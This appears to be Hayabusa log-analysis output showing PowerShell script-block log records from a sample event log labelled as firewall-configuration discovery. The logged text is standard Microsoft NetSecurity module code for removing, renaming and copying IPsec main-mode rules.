$true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(Pa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFire",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"wallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] 